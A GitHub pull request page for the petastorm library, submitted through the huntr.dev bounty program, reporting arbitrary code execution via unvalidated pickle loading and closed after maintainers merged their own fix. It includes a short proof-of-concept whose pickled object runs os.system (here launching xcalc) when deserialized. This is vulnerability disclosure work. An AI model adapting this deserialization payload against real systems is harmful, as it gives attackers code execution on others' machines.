uber / petastorm

Petastorm library enables single machine or distributed training and evaluation of deep learning models from datasets in Apache Parquet format. It supports ML frameworks such as Tensorflow, Pytorch, and PySpark and can be used from pure Python code.
Apache License 2.0
1.78k stars 285 forks source link

Security Fix for Arbitrary Code Execution - huntr.dev #637

Closed huntr-helper closed 2 years ago

huntr-helper commented 3 years ago

https://huntr.dev/users/d3m0n-r00t has fixed the Arbitrary Code Execution vulnerability 🔨. Think you could fix a vulnerability like this?

Get involved at https://huntr.dev/

Q | A Version Affected | ALL Bug Fix | YES Original Pull Request | https://github.com/418sec/petastorm/pull/1 Vulnerability README | https://github.com/418sec/huntr/blob/master/bounties/pip/petastorm/1/README.md

User Comments:

📊 Metadata *

Fixed Arbitrary code execution in petastorm

Bounty URL: https://www.huntr.dev/bounties/1-pip-petastorm/

⚙️ Description *

Petastorm is an open source data access library developed at Uber ATG. This library enables single machine or distributed training and evaluation of deep learning models directly from datasets in Apache Parquet format. Petastorm supports popular Python-based machine learning (ML) frameworks such as Tensorflow, PyTorch, and PySpark. It can also be used from pure Python code.

Vulnerability description untrusted loading of data by the pickle.load function leading to Arbitrary code execution.

💻 Technical Description *

The function depickle_legacy_package_name_compatible() blindly loads a pickle file without any validation making it vulnerable to Arbitrary Code Execution. If the input pickle file is a malicious payload, create a file remotely.

🐛 Proof of Concept (PoC) *

import os
import pickle
#os.system('pip3 install petastorm')
from petastorm.etl import legacy
#payload formation
class ArbitraryCode:
    def __reduce__(self):
        cmd = ('xcalc')
        return os.system, (cmd,)
#Exploiting
dumps = pickle.dumps(ArbitraryCode())
legacy.depickle_legacy_package_name_compatible(dumps)

Screenshot 2021-01-05 193250

🔥 Proof of Fix (PoF) *

Screenshot 2021-01-05 193940

Fix when subprocess is called. Screenshot 2021-01-05 195008

👍 User Acceptance Testing (UAT)

Applied fix from pickle official fix as explained in here. https://www.cmi.ac.in/~madhavan/courses/python-2014/docs/python-3.2.1-docs-html/library/pickle.html Proper working. (Something other than a payload). Screenshot 2021-01-05 195158

CLAassistant commented 3 years ago

CLA assistant check
All committers have signed the CLA.

JamieSlome commented 3 years ago

@d3m0n-r00t - are you able to sign the CLA? Cheers! 🍰

selitvin commented 3 years ago

Thanks for the proposed fix. I created #640 which properly fixes the issue in the context of petastorm (this PR would not pass unit tests)

selitvin commented 2 years ago

Fixed by #640. Closing this PR.